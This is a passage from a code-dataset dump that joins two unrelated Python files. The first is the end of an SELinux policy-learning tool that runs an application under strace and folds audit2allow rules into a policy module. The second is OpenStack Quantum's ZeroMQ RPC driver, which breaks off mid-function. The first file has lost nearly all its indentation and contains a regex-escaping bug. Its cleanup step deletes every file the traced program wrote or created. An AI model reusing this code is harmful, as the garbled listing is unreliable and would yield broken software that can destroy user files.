line = line.decode()
log(2, "line[:10] = '%s'" % (line[:10]))
if line[:10] == "#=========":
fields=line.split(" ")
if fields[1] == domain_t:
store = True
else:
store = False
else:
if store and len(line)>0:
rules.append(line);
return rules
def regeneratePolicy(policy_path, rules, permissive_domains = list()):
# Add the lines to the policy
template_te = open(policy_path, "a");
#template_te.writelines(rules)
for line in rules:
template_te.write(line+"\n")
template_te.close()
# Parse it
scanner = SELinuxScanner()
parser = SELinuxParser(scanner)
te_file = open(policy_path, "r")
tokens = parser.parse(te_file.read())
te_file.close()
# Store it optimized
optimizer = SELinuxOptimizer(tokens)
optimizer.selfize_rules()
optimizer.factorize_rules()
optimizer.factorize_rule_attributes()
optimizer.sort_rules()
optimizer.to_file(policy_path, permissive_domains)
def updateAndReloadRules(module_name, module_domain_t, enforcingMode = True, forceReload=False):
log(1, "Read the audit2allow output")
rules = getAudit2AllowRules(module_domain_t)
if forceReload or len(rules) > 0:
log(0, "Add %i rules to %s and reload the policy" % (len(rules), getPolicyPath(module_name, "te")))
if not enforcingMode:
permissive_domains = [module_domain_t]
else:
permissive_domains = list()
regeneratePolicy(getPolicyPath(module_name, "te"), rules, permissive_domains)
# empty the logs
dmesg = subprocess.Popen([dmesg_path, '-c'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
dmesg.communicate()
# Load the new policy
compileAndLoadSELinuxModule(getPolicyPath(module_name, ""))
return len(rules)
def runApp(module_name, app_path, useStrace=False):
if useStrace and os.path.exists(strace_path):
print("Launch the application and trace it with strace")
proc = subprocess.Popen([strace_path, '-e' 'trace=open,execve,mkdir', '-o', "%sstrace" % getTempModuleTransitionPath("selpolgen-%s" % module_name, ""), '-ff', '-F', app_path])
else:
print("Launch the application")
proc = subprocess.Popen([app_path])
# get the pid
curPID = proc.pid
return proc
def askToRunApp(app_path, domain_t, audit_fc=False):
deleteFileList(["/tmp/selinux-audit"])
print("\n****** Entering the auditing loop ******")
if audit_fc:
print("The application you are auditing will first be launched in a permissive mode, be sure to use all the functionnalities before quitting it.\n")
print("Please launch this command in the domain %s: %s" % (domain_t, "selaudit_user.sh %s" % app_path))
def getFileCon(filepath):
proc = subprocess.Popen([ls_path, '-Z', filepath], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout,stderr = proc.communicate()
if proc.returncode != 0:
# print("Error while getting the context of the file '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>" % (filepath, stdout, stderr), file=sys.stderr)
return "<Context not found>"
fields = str(stdout, "utf-8").split(' ')
log(2, "getFileCon('%s') = '%s'" % (filepath, fields[0]))
return fields[0]
def deleteFileList(to_be_deleted):
for f in to_be_deleted:
try:
if os.path.isfile(f) or os.path.islink(f):
os.remove(f)
elif os.path.isdir(f):
shutil.rmtree(f)
except Exception as inst:
print("deleteFileList: Caught exception %s: %s" % (type(inst), inst))
pass
def escape_re(re):
re = re.replace(".", "\\.");
re = re.replace("(", "\\)");
re = re.replace(")", "\\)");
re = re.replace("|", "\\|");
re = re.replace("^", "\\^");
re = re.replace("*", "\\*");
re = re.replace("+", "\\+");
re = re.replace("?", "\\?");
return re
def auditStraceLogs(module_name, dir_path="/tmp/selinux-audit/", saveResults=True):
# dir_path = getTempModuleTransitionPath("selpolgen-%s" % module_name, "")
execves = dict()
mkdirs = dict()
opens = dict()
libs = dict()
shms = dict()
failed = list()
to_be_deleted = list()
# Read all the logs
log_files = glob.glob("%s/strace*" % dir_path)
for log in log_files:
f = open(log, "r")
for line in f:
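			# Illustrative (made-up) strace lines the regex below is meant to match:
			#   open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
			#   mkdir("/tmp/example-dir", 0755) = 0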
m = re.match(r"(?P<function>\w+) *\((?P<params>.*)\) *= *(?P<result>.*)", line)
if m:
args = m.group('params').split(', ')
if not m.group('result').startswith("-1"):
line = "%s(%s)" % (m.group('function'), ','.join(args))
m2 = re.match(r"\"(.*)\"", args[0])
if m2:
filepath = m2.group(1)
if m.group('function') == "open":
if args[1].find('O_CREAT') != -1 or args[1].find('O_WRONLY') != -1:
to_be_deleted.append(filepath)
# Is the file a standard library ?
stdlib = re.match(r"/(usr/)?lib/[^/]+", filepath)
if filepath.startswith('/dev/shm'):
if filepath not in shms:
shms[filepath] = list()
if line not in shms[filepath]:
shms[filepath].append(line)
elif stdlib:
								if filepath not in libs:
libs[filepath] = list()
if line not in libs[filepath]:
libs[filepath].append(line)
else:
if filepath not in opens:
opens[filepath] = list()
if line not in opens[filepath]:
opens[filepath].append(line)
elif m.group('function') == "mkdir":
if filepath not in mkdirs:
mkdirs[filepath] = list()
if line not in mkdirs[filepath]:
mkdirs[filepath].append(line)
to_be_deleted.append(filepath)
elif m.group('function') == "execve":
if filepath not in execves:
execves[filepath] = list()
if line not in execves[filepath]:
execves[filepath].append(line)
else:
line = "%s(%s)" % (m.group('function'), ','.join(args))
f.close()
# Delete all the strace files
deleteFileList(log_files);
if saveResults:
# We have the logs, sorted by type and by path, generate the output file
fc_file = open(getPolicyPath(module_name, "fc"), "a")
fc_file.write("\n\n\n# **** Mkdir ****\n")
mkdir_keys = mkdirs.keys()
for dir_path in sorted(mkdir_keys):
# Write all the interactions with this file
for call in mkdirs[dir_path]:
fc_file.write("# %s\n" % call)
# Propose a rule
fc_file.write("#%s/(.*/)? %s\n\n" % (escape_re(dir_path), getFileCon(dir_path)))
fc_file.write("\n\n\n# **** Execve ****\n")
execve_keys = execves.keys()
for exe_path in sorted(execve_keys):
# Write all the interactions with this file
for call in execves[exe_path]:
fc_file.write("# %s\n" % call)
# Propose a rule
fc_file.write("#%s -- %s\n\n" % (escape_re(exe_path), getFileCon(exe_path)))
fc_file.write("\n\n\n# **** Open ****\n")
open_keys = opens.keys()
for open_path in sorted(open_keys):
# Write all the interactions with this file
for call in opens[open_path]:
fc_file.write("# %s\n" % call)
# Propose a rule
fc_file.write("#%s -- %s\n\n" % (escape_re(open_path), getFileCon(open_path)))
fc_file.write("\n\n\n# **** Standard libraries ****\n")
libs_keys = libs.keys()
for lib_path in sorted(libs_keys):
# Write all the interactions with this file
for call in libs[lib_path]:
fc_file.write("# %s\n" % call)
# Propose a rule
fc_file.write("#%s -- %s\n\n" % (escape_re(lib_path), getFileCon(lib_path)))
fc_file.write("\n\n\n# **** SHM ****\n")
shms_keys = shms.keys()
for shm_path in sorted(shms_keys):
# Write all the interactions with this file
for call in shms[shm_path]:
fc_file.write("# %s\n" % call)
# Propose a rule
fc_file.write("#%s -- %s\n\n" % (escape_re(shm_path), getFileCon(shm_path)))
# Delete all the created files
deleteFileList(to_be_deleted);
def parseFCFile(policy_fc):
# Read the fc policy
if not os.path.exists(policy_fc):
return set(), "The fc policy file %s doesn't exist\n" % policy_fc
fc_policy_file = open("%s" % policy_fc, "r")
# split the fc policy file
fc_policies = []
for line in fc_policy_file:
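		# Illustrative (made-up) fc lines the regex below should accept:
		#   /usr/bin/foo -- system_u:object_r:foo_exec_t
		#   #/var/log/foo(/.*)?  system_u:object_r:foo_log_t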
m = re.match(r"\s*(?P<comment>#)?(?P<path>\\?/\S+)\s+(?P<type>\S+)?\s+(?P<context>\S+)", line)
if m:
pol = dict()
pol['path'] = m.groupdict()['path']
pol['type'] = m.groupdict()['type']
pol['context'] = m.groupdict()['context']
pol['commented'] = m.groupdict()['comment']=="#"
if (pol['type'] == None):
pol['type'] = ''
#print("Found rule: comment = '%s' path='%s', type='%s', context='%s'" % (pol['commented'], pol['path'], pol['type'], pol['context']))
fc_policies.append(pol)
return fc_policies
def addFCContextsToTE(policy_fc, policy_te):
# Read the te policy
if not os.path.exists(policy_te):
return set(), "The te policy file %s doesn't exist\n" % policy_fc
te_policy_file = open("%s" % policy_te, "a")
fc_policies = parseFCFile(policy_fc)
for policy in fc_policies:
if not policy['commented']:
print("got context %s\n" % policy['context'])
te_policy_file.write("type %s;\nfiles_type(%s);\n" % (policy['context'], policy['context']))
te_policy_file.close()
def editFiles(filepathes):
editor_path = os.getenv('EDITOR')
if not editor_path:
print('The $EDITOR environement variable is not set.\nWhich editor would you like to use ?')
editor = input('')
os.environ['EDITOR'] = editor
params = [editor_path]
params.extend(filepathes)
proc = subprocess.Popen(params)
proc.communicate()
return proc.returncode == 0
def willingToQuit():
print("\nThe system is currently learning a SELinux security policy.")
print("Deciding to stop it now means you have successfully tested all the functionnalities of the software you are auditing.")
print("\nAre you sure you want to stop it ? (y/N)")
answer=input('')
if answer in ('y', 'Y', 'Yes', 'yes'):
return True
else:
return False
def startAuditing(module_name, app_path, module_domain_t, module_tmp_domain_t, module_log_domain_t, module_exec_t, user_u, user_r, user_t, audit_fc, reuse):
# Re-route signals to the launched process
signal.signal(signal.SIGINT, handler)
signal.signal(signal.SIGTERM, handler)
signal.signal(signal.SIGHUP, handler)
global wantToAbort
wantToAbort = False
if not reuse:
# Get a base policy and load it
print("Generate the base policy and load it")
base_policy=generateBasePolicy(module_name, app_path, module_domain_t, module_tmp_domain_t, module_log_domain_t, module_exec_t, user_u, user_r, user_t, audit_fc)
if not compileAndLoadSELinuxModule(base_policy):
return False
else:
if not os.path.exists(getPolicyPath(module_name, "te")):
print("The module %s doesn't exist." % module_name)
return
	# Create a policy for selpolgen.py so that when it launches the audited program, the audited program will transition to the right domain
print("Generate the sysadm policy to launch the application in the right context")
temp_policy=generateAuditPolicy(module_name, app_path, module_domain_t, module_exec_t, user_u, user_r, user_t)
if not compileAndLoadSELinuxModule(temp_policy):
return False
# Set the app context on the disc
print("Set the application file's new context")
setFileSELinuxContext("system_u", "object_r", module_exec_t, app_path)
# run the application
askToRunApp(app_path, user_t, audit_fc);
if audit_fc:
isRunning = True
while isRunning :
if wantToAbort:
if willingToQuit():
sys.exit(0)
else:
wantToAbort = False
time.sleep(0.1)
# remove the lock if the file exists
if os.path.exists("/tmp/selinux-audit/lock"):
isRunning = False
# Propose some file constraints
print("Update the fc file, this may take a while");
auditStraceLogs(module_name)
# Regenerate the policy
updateAndReloadRules(module_name, module_domain_t, enforcingMode = True, forceReload=True)
# let the application start again
os.remove("/tmp/selinux-audit/lock")
print("FC Labelling done\n")
print("Start the TE learning loop")
# learning loop
nbRulesAddedSinceLastExecution = 0
execStart = time.time()
zeroRuleLoopCount = 0
while True:
if wantToAbort:
if willingToQuit():
break
else:
wantToAbort = False
time.sleep(0.1)
nbRulesAddedSinceLastExecution += updateAndReloadRules(module_name, module_domain_t)
# remove the lock if the file exists
if os.path.exists("/tmp/selinux-audit/lock"):
if nbRulesAddedSinceLastExecution > 0:
auditStraceLogs(module_name, dir_path="/tmp/selinux-audit/", saveResults=False)
zeroRuleLoopCount = 0
elif time.time()-execStart > 2.0 or zeroRuleLoopCount > 5:
print("\n**********\nNo rules have been added during the execution of this audit instance.")
print("Have you tested every use case allowed for the application ? (y/N)")
answer=input('')
print("**********")
if answer in ('y', 'Y', 'Yes', 'yes'):
break
zeroRuleLoopCount = 0
else:
zeroRuleLoopCount = zeroRuleLoopCount + 1
print("The instance didn't generate any rules but carry on nevertheless (%s/5)" % zeroRuleLoopCount)
nbRulesAddedSinceLastExecution = 0
execStart = time.time()
os.remove("/tmp/selinux-audit/lock");
print("\nThe final policy can be found at %s" % getPolicyPath(module_name, ""))
class Usage(Exception):
def __init__(self, msg):
Exception.__init__(self)
self.msg = msg
def show_help():
print("Help:\n")
print("-h or --help : This help message")
print("-m or --module : The name of the SELinux module you would like to create (mandatory)")
print("-u or --user_u : The SELinux user who will execute the application")
print("-r or --user_r : The SELinux role who will execute the application")
print("-t or --user_t : The SELinux type who will execute the application")
print("-d or --module_domain_t : The domain in which the audited application will be executed")
print("-e or --module_exec_t : The file label that will be given to the application")
print("-t or --module_tmp_domain_t : The file label that will be given to the application's tmp files")
print("-l or --module_log_domain_t : The file label that will be given to the application's log files")
print("-f or --no_fc_pass : Do not fill the fc file. Learning the policy will take one iteration less")
print("-p or --reuse_policy : Re-use a pre-existing policy and learn what's new")
def main(argv=None):
if argv is None:
argv = sys.argv
cwd = os.path.dirname(os.path.realpath(argv[0])) + '/'
os.chdir(cwd)
try:
# Check the given parameter names and get their values
try:
opts, args = getopt.getopt(argv[1:], "hvm:u:r:t:d:e:t:l:fp",
["help", "verbose", "module=", "user_u=", "user_r=", "user_t=", "module_domain_t=", "module_exec_t=", "module_tmp_domain_t=", "module_log_domain_t=", "no_fc_pass", "reuse_policy"])
except(getopt.error) as msg:
print("Argument parsing error: %s" % msg)
raise Usage(msg)
# Params
module_name = ''
module_domain_t = ''
module_exec_t = ''
module_tmp_domain_t = ''
module_log_domain_t = ''
audit_fc = True
app_fullpath = ''
user_u = user_u_default
user_r = user_r_default
user_t = user_t_default
reuse = False
# Get the parameters
for opt, arg in opts:
if opt in ("-h", "--help"):
show_help()
return 0
elif opt in ("-v", "--verbose"):
verbosity += 1
elif opt in ("-m", "--module"):
module_name = arg
elif opt in ("-u", "--user_u"):
user_u = arg
elif opt in ("-r", "--user_r"):
user_r = arg
elif opt in ("-t", "--user_t"):
user_t = arg
elif opt in ("-e", "--module_exec_t"):
module_exec_t = arg
elif opt in ("-d", "--module_domain_t"):
module_domain_t = arg
elif opt in ("-t", "--module_tmp_domain_t"):
module_tmp_domain_t = arg
elif opt in ("-l", "--module_log_domain_t"):
module_log_domain_t = arg
elif opt in ("-f", "--no_fc_pass"):
audit_fc = False
elif opt in ("-p", "--reuse_policy"):
reuse = True
# if there are no args left, then an error happened
if len(args) == 0 or module_name == '':
print('Usage: %s [options] -m module_name filepath' % sys.argv[0], file=sys.stderr)
else:
# Get the fullpath
app_fullpath = args[len(args)-1]
# Set the default value for module_domain_t & module_exec_t if there were not set by the user
if module_domain_t == '':
module_domain_t = module_domain_t_default_pattern.replace("%modulename%", module_name)
if module_exec_t == '':
module_exec_t = module_exec_t_default_pattern.replace("%modulename%", module_name)
if module_tmp_domain_t == '':
module_tmp_domain_t = module_tmp_domain_t_default_pattern.replace("%modulename%", module_name)
if module_log_domain_t == '':
module_log_domain_t = module_log_domain_t_default_pattern.replace("%modulename%", module_name)
# Let's recap to the user what he has chosen.
print('You are about to create a SELinux module for the application')
print('')
print('Here is the summary of how it will be created:')
print(' Module name (-m): %s' % module_name)
print(' Application path: \'%s\'' % app_fullpath)
print(' Will be labelled as ():():(-e):%s:%s:%s' % ('system_u', 'object_r', module_exec_t))
print(' Be executed by (-u):(-r):(-t): %s:%s:%s' % (user_u, user_r, user_t))
print(' Jailed in the domain (-d): %s' % module_domain_t)
print(' Tmp file\'s domain is (-t): %s' % module_tmp_domain_t)
print(' Log file\'s domain is (-l): %s' % module_log_domain_t)
print(' Do not audit the fc file (bad practice!) (-f): %s' % (not audit_fc))
print(' Re-use an existing policy (-p): %s' % (reuse))
print('')
print('Do you agree with that ? (Y/n)')
answer=input('')
if answer in ('', 'y', 'Y', 'Yes', 'yes'):
startAuditing(module_name, app_fullpath, module_domain_t, module_tmp_domain_t, module_log_domain_t, module_exec_t, user_u, user_r, user_t, audit_fc, reuse)
else:
return 0
except(Usage) as err:
print('%s: %s' % (sys.argv[0], err.msg), file=sys.stderr)
print('For a list of available options, use "%s --help"'\
% sys.argv[0], file=sys.stderr)
return -1
if __name__ == '__main__':
main()
| gpl-3.0 | -7,108,910,309,036,765,000 | 32.52431 | 267 | 0.65428 | false | 2.978286 | false | false | false |
rossella/neutron | quantum/openstack/common/rpc/impl_zmq.py | 1 | 25519 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 Cloudscaling Group, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import pprint
import socket
import string
import sys
import types
import uuid
import eventlet
import greenlet
from quantum.openstack.common import cfg
from quantum.openstack.common.gettextutils import _
from quantum.openstack.common import importutils
from quantum.openstack.common import jsonutils
from quantum.openstack.common import processutils as utils
from quantum.openstack.common.rpc import common as rpc_common
zmq = importutils.try_import('eventlet.green.zmq')
# Imported here for convenience; these objects are not modified.
pformat = pprint.pformat
Timeout = eventlet.timeout.Timeout
LOG = rpc_common.LOG
RemoteError = rpc_common.RemoteError
RPCException = rpc_common.RPCException
zmq_opts = [
cfg.StrOpt('rpc_zmq_bind_address', default='*',
help='ZeroMQ bind address. Should be a wildcard (*), '
'an ethernet interface, or IP. '
'The "host" option should point or resolve to this '
'address.'),
# The module.Class to use for matchmaking.
cfg.StrOpt(
'rpc_zmq_matchmaker',
default=('quantum.openstack.common.rpc.'
'matchmaker.MatchMakerLocalhost'),
help='MatchMaker driver',
),
# The following port is unassigned by IANA as of 2012-05-21
cfg.IntOpt('rpc_zmq_port', default=9501,
help='ZeroMQ receiver listening port'),
cfg.IntOpt('rpc_zmq_contexts', default=1,
help='Number of ZeroMQ contexts, defaults to 1'),
cfg.IntOpt('rpc_zmq_topic_backlog', default=None,
help='Maximum number of ingress messages to locally buffer '
'per topic. Default is unlimited.'),
cfg.StrOpt('rpc_zmq_ipc_dir', default='/var/run/openstack',
help='Directory for holding IPC sockets'),
cfg.StrOpt('rpc_zmq_host', default=socket.gethostname(),
help='Name of this node. Must be a valid hostname, FQDN, or '
'IP address. Must match "host" option, if running Nova.')
]
CONF = cfg.CONF
CONF.register_opts(zmq_opts)
ZMQ_CTX = None # ZeroMQ Context, must be global.
matchmaker = None # memoized matchmaker object
def _serialize(data):
"""
Serialization wrapper
We prefer using JSON, but it cannot encode all types.
Error if a developer passes us bad data.
"""
try:
return str(jsonutils.dumps(data, ensure_ascii=True))
except TypeError:
LOG.error(_("JSON serialization failed."))
raise
def _deserialize(data):
"""
Deserialization wrapper
"""
LOG.debug(_("Deserializing: %s"), data)
return jsonutils.loads(data)
class ZmqSocket(object):
"""
A tiny wrapper around ZeroMQ to simplify the send/recv protocol
and connection management.
Can be used as a Context (supports the 'with' statement).
"""
def __init__(self, addr, zmq_type, bind=True, subscribe=None):
self.sock = _get_ctxt().socket(zmq_type)
self.addr = addr
self.type = zmq_type
self.subscriptions = []
# Support failures on sending/receiving on wrong socket type.
self.can_recv = zmq_type in (zmq.PULL, zmq.SUB)
self.can_send = zmq_type in (zmq.PUSH, zmq.PUB)
self.can_sub = zmq_type in (zmq.SUB, )
# Support list, str, & None for subscribe arg (cast to list)
do_sub = {
list: subscribe,
str: [subscribe],
type(None): []
}[type(subscribe)]
for f in do_sub:
self.subscribe(f)
str_data = {'addr': addr, 'type': self.socket_s(),
'subscribe': subscribe, 'bind': bind}
LOG.debug(_("Connecting to %(addr)s with %(type)s"), str_data)
LOG.debug(_("-> Subscribed to %(subscribe)s"), str_data)
LOG.debug(_("-> bind: %(bind)s"), str_data)
try:
if bind:
self.sock.bind(addr)
else:
self.sock.connect(addr)
except Exception:
raise RPCException(_("Could not open socket."))
def socket_s(self):
"""Get socket type as string."""
t_enum = ('PUSH', 'PULL', 'PUB', 'SUB', 'REP', 'REQ', 'ROUTER',
'DEALER')
return dict(map(lambda t: (getattr(zmq, t), t), t_enum))[self.type]
def subscribe(self, msg_filter):
"""Subscribe."""
if not self.can_sub:
raise RPCException("Cannot subscribe on this socket.")
LOG.debug(_("Subscribing to %s"), msg_filter)
try:
self.sock.setsockopt(zmq.SUBSCRIBE, msg_filter)
except Exception:
return
self.subscriptions.append(msg_filter)
def unsubscribe(self, msg_filter):
"""Unsubscribe."""
if msg_filter not in self.subscriptions:
return
self.sock.setsockopt(zmq.UNSUBSCRIBE, msg_filter)
self.subscriptions.remove(msg_filter)
def close(self):
if self.sock is None or self.sock.closed:
return
# We must unsubscribe, or we'll leak descriptors.
if len(self.subscriptions) > 0:
for f in self.subscriptions:
try:
self.sock.setsockopt(zmq.UNSUBSCRIBE, f)
except Exception:
pass
self.subscriptions = []
try:
# Default is to linger
self.sock.close()
except Exception:
# While this is a bad thing to happen,
# it would be much worse if some of the code calling this
# were to fail. For now, lets log, and later evaluate
# if we can safely raise here.
LOG.error("ZeroMQ socket could not be closed.")
self.sock = None
def recv(self):
if not self.can_recv:
raise RPCException(_("You cannot recv on this socket."))
return self.sock.recv_multipart()
def send(self, data):
if not self.can_send:
raise RPCException(_("You cannot send on this socket."))
self.sock.send_multipart(data)
class ZmqClient(object):
"""Client for ZMQ sockets."""
def __init__(self, addr, socket_type=None, bind=False):
if socket_type is None:
socket_type = zmq.PUSH
self.outq = ZmqSocket(addr, socket_type, bind=bind)
def cast(self, msg_id, topic, data, serialize=True, force_envelope=False):
if serialize:
data = rpc_common.serialize_msg(data, force_envelope)
self.outq.send([str(msg_id), str(topic), str('cast'),
_serialize(data)])
def close(self):
self.outq.close()
class RpcContext(rpc_common.CommonRpcContext):
"""Context that supports replying to a rpc.call."""
def __init__(self, **kwargs):
self.replies = []
super(RpcContext, self).__init__(**kwargs)
def deepcopy(self):
values = self.to_dict()
values['replies'] = self.replies
return self.__class__(**values)
def reply(self, reply=None, failure=None, ending=False):
if ending:
return
self.replies.append(reply)
@classmethod
def marshal(self, ctx):
ctx_data = ctx.to_dict()
return _serialize(ctx_data)
@classmethod
def unmarshal(self, data):
return RpcContext.from_dict(_deserialize(data))
class InternalContext(object):
"""Used by ConsumerBase as a private context for - methods."""
def __init__(self, proxy):
self.proxy = proxy
self.msg_waiter = None
def _get_response(self, ctx, proxy, topic, data):
"""Process a curried message and cast the result to topic."""
LOG.debug(_("Running func with context: %s"), ctx.to_dict())
data.setdefault('version', None)
data.setdefault('args', {})
try:
result = proxy.dispatch(
ctx, data['version'], data['method'], **data['args'])
return ConsumerBase.normalize_reply(result, ctx.replies)
except greenlet.GreenletExit:
# ignore these since they are just from shutdowns
pass
except rpc_common.ClientException, e:
LOG.debug(_("Expected exception during message handling (%s)") %
e._exc_info[1])
return {'exc':
rpc_common.serialize_remote_exception(e._exc_info,
log_failure=False)}
except Exception:
LOG.error(_("Exception during message handling"))
return {'exc':
rpc_common.serialize_remote_exception(sys.exc_info())}
def reply(self, ctx, proxy,
msg_id=None, context=None, topic=None, msg=None):
"""Reply to a casted call."""
# Our real method is curried into msg['args']
child_ctx = RpcContext.unmarshal(msg[0])
response = ConsumerBase.normalize_reply(
self._get_response(child_ctx, proxy, topic, msg[1]),
ctx.replies)
LOG.debug(_("Sending reply"))
cast(CONF, ctx, topic, {
'method': '-process_reply',
'args': {
'msg_id': msg_id,
'response': response
}
})
class ConsumerBase(object):
"""Base Consumer."""
def __init__(self):
self.private_ctx = InternalContext(None)
@classmethod
def normalize_reply(self, result, replies):
#TODO(ewindisch): re-evaluate and document this method.
if isinstance(result, types.GeneratorType):
return list(result)
elif replies:
return replies
else:
return [result]
def process(self, style, target, proxy, ctx, data):
# Method starting with - are
# processed internally. (non-valid method name)
method = data['method']
# Internal method
# uses internal context for safety.
if data['method'][0] == '-':
# For reply / process_reply
method = method[1:]
if method == 'reply':
self.private_ctx.reply(ctx, proxy, **data['args'])
return
data.setdefault('version', None)
data.setdefault('args', {})
proxy.dispatch(ctx, data['version'],
data['method'], **data['args'])
class ZmqBaseReactor(ConsumerBase):
"""
A consumer class implementing a
centralized casting broker (PULL-PUSH)
for RoundRobin requests.
"""
def __init__(self, conf):
super(ZmqBaseReactor, self).__init__()
self.mapping = {}
self.proxies = {}
self.threads = []
self.sockets = []
self.subscribe = {}
self.pool = eventlet.greenpool.GreenPool(conf.rpc_thread_pool_size)
def register(self, proxy, in_addr, zmq_type_in, out_addr=None,
zmq_type_out=None, in_bind=True, out_bind=True,
subscribe=None):
LOG.info(_("Registering reactor"))
if zmq_type_in not in (zmq.PULL, zmq.SUB):
raise RPCException("Bad input socktype")
# Items push in.
inq = ZmqSocket(in_addr, zmq_type_in, bind=in_bind,
subscribe=subscribe)
self.proxies[inq] = proxy
self.sockets.append(inq)
LOG.info(_("In reactor registered"))
if not out_addr:
return
if zmq_type_out not in (zmq.PUSH, zmq.PUB):
raise RPCException("Bad output socktype")
# Items push out.
outq = ZmqSocket(out_addr, zmq_type_out, bind=out_bind)
self.mapping[inq] = outq
self.mapping[outq] = inq
self.sockets.append(outq)
LOG.info(_("Out reactor registered"))
def consume_in_thread(self):
def _consume(sock):
LOG.info(_("Consuming socket"))
while True:
self.consume(sock)
for k in self.proxies.keys():
self.threads.append(
self.pool.spawn(_consume, k)
)
def wait(self):
for t in self.threads:
t.wait()
def close(self):
for s in self.sockets:
s.close()
for t in self.threads:
t.kill()
class ZmqProxy(ZmqBaseReactor):
"""
A consumer class implementing a
topic-based proxy, forwarding to
IPC sockets.
"""
def __init__(self, conf):
super(ZmqProxy, self).__init__(conf)
self.topic_proxy = {}
def consume(self, sock):
ipc_dir = CONF.rpc_zmq_ipc_dir
#TODO(ewindisch): use zero-copy (i.e. references, not copying)
data = sock.recv()
msg_id, topic, style, in_msg = data
topic = topic.split('.', 1)[0]
LOG.debug(_("CONSUMER GOT %s"), ' '.join(map(pformat, data)))
# Handle zmq_replies magic
if topic.startswith('fanout~'):
sock_type = zmq.PUB
elif topic.startswith('zmq_replies'):
sock_type = zmq.PUB
inside = rpc_common.deserialize_msg(_deserialize(in_msg))
msg_id = inside[-1]['args']['msg_id']
response = inside[-1]['args']['response']
LOG.debug(_("->response->%s"), response)
data = [str(msg_id), _serialize(response)]
else:
sock_type = zmq.PUSH
if not topic in self.topic_proxy:
def publisher(waiter):
LOG.info(_("Creating proxy for topic: %s"), topic)
try:
out_sock = ZmqSocket("ipc://%s/zmq_topic_%s" %
(ipc_dir, topic),
sock_type, bind=True)
except RPCException:
waiter.send_exception(*sys.exc_info())
return
self.topic_proxy[topic] = eventlet.queue.LightQueue(
CONF.rpc_zmq_topic_backlog)
self.sockets.append(out_sock)
# It takes some time for a pub socket to open,
# before we can have any faith in doing a send() to it.
if sock_type == zmq.PUB:
eventlet.sleep(.5)
waiter.send(True)
while(True):
data = self.topic_proxy[topic].get()
out_sock.send(data)
LOG.debug(_("ROUTER RELAY-OUT SUCCEEDED %(data)s") %
{'data': data})
wait_sock_creation = eventlet.event.Event()
eventlet.spawn(publisher, wait_sock_creation)
try:
wait_sock_creation.wait()
except RPCException:
LOG.error(_("Topic socket file creation failed."))
return
try:
self.topic_proxy[topic].put_nowait(data)
LOG.debug(_("ROUTER RELAY-OUT QUEUED %(data)s") %
{'data': data})
except eventlet.queue.Full:
LOG.error(_("Local per-topic backlog buffer full for topic "
"%(topic)s. Dropping message.") % {'topic': topic})
def consume_in_thread(self):
"""Runs the ZmqProxy service"""
ipc_dir = CONF.rpc_zmq_ipc_dir
consume_in = "tcp://%s:%s" % \
(CONF.rpc_zmq_bind_address,
CONF.rpc_zmq_port)
consumption_proxy = InternalContext(None)
if not os.path.isdir(ipc_dir):
try:
utils.execute('mkdir', '-p', ipc_dir, run_as_root=True)
utils.execute('chown', "%s:%s" % (os.getuid(), os.getgid()),
ipc_dir, run_as_root=True)
utils.execute('chmod', '750', ipc_dir, run_as_root=True)
except utils.ProcessExecutionError:
LOG.error(_("Could not create IPC directory %s") %
(ipc_dir, ))
raise
try:
self.register(consumption_proxy,
consume_in,
zmq.PULL,
out_bind=True)
except zmq.ZMQError:
LOG.error(_("Could not create ZeroMQ receiver daemon. "
"Socket may already be in use."))
raise
super(ZmqProxy, self).consume_in_thread()
class ZmqReactor(ZmqBaseReactor):
"""
A consumer class implementing a
consumer for messages. Can also be
used as a 1:1 proxy
"""
def __init__(self, conf):
super(ZmqReactor, self).__init__(conf)
def consume(self, sock):
#TODO(ewindisch): use zero-copy (i.e. references, not copying)
data = sock.recv()
LOG.debug(_("CONSUMER RECEIVED DATA: %s"), data)
if sock in self.mapping:
LOG.debug(_("ROUTER RELAY-OUT %(data)s") % {
'data': data})
self.mapping[sock].send(data)
return
msg_id, topic, style, in_msg = data
ctx, request = rpc_common.deserialize_msg(_deserialize(in_msg))
ctx = RpcContext.unmarshal(ctx)
proxy = self.proxies[sock]
self.pool.spawn_n(self.process, style, topic,
proxy, ctx, request)
class Connection(rpc_common.Connection):
"""Manages connections and threads."""
def __init__(self, conf):
self.reactor = ZmqReactor(conf)
def create_consumer(self, topic, proxy, fanout=False):
# Only consume on the base topic name.
topic = topic.split('.', 1)[0]
LOG.info(_("Create Consumer for topic (%(topic)s)") %
{'topic': topic})
# Subscription scenarios
if fanout:
subscribe = ('', fanout)[type(fanout) == str]
sock_type = zmq.SUB
topic = 'fanout~' + topic
else:
sock_type = zmq.PULL
subscribe = None
# Receive messages from (local) proxy
inaddr = "ipc://%s/zmq_topic_%s" % \
(CONF.rpc_zmq_ipc_dir, topic)
LOG.debug(_("Consumer is a zmq.%s"),
['PULL', 'SUB'][sock_type == zmq.SUB])
self.reactor.register(proxy, inaddr, sock_type,
subscribe=subscribe, in_bind=False)
def close(self):
self.reactor.close()
def wait(self):
self.reactor.wait()
def consume_in_thread(self):
self.reactor.consume_in_thread()
def _cast(addr, context, msg_id, topic, msg, timeout=None, serialize=True,
force_envelope=False):
timeout_cast = timeout or CONF.rpc_cast_timeout
payload = [RpcContext.marshal(context), msg]
with Timeout(timeout_cast, exception=rpc_common.Timeout):
try:
conn = ZmqClient(addr)
# assumes cast can't return an exception
conn.cast(msg_id, topic, payload, serialize, force_envelope)
except zmq.ZMQError:
raise RPCException("Cast failed. ZMQ Socket Exception")
finally:
if 'conn' in vars():
conn.close()
def _call(addr, context, msg_id, topic, msg, timeout=None,
serialize=True, force_envelope=False):
# timeout_response is how long we wait for a response
timeout = timeout or CONF.rpc_response_timeout
# The msg_id is used to track replies.
msg_id = uuid.uuid4().hex
# Replies always come into the reply service.
reply_topic = "zmq_replies.%s" % CONF.rpc_zmq_host
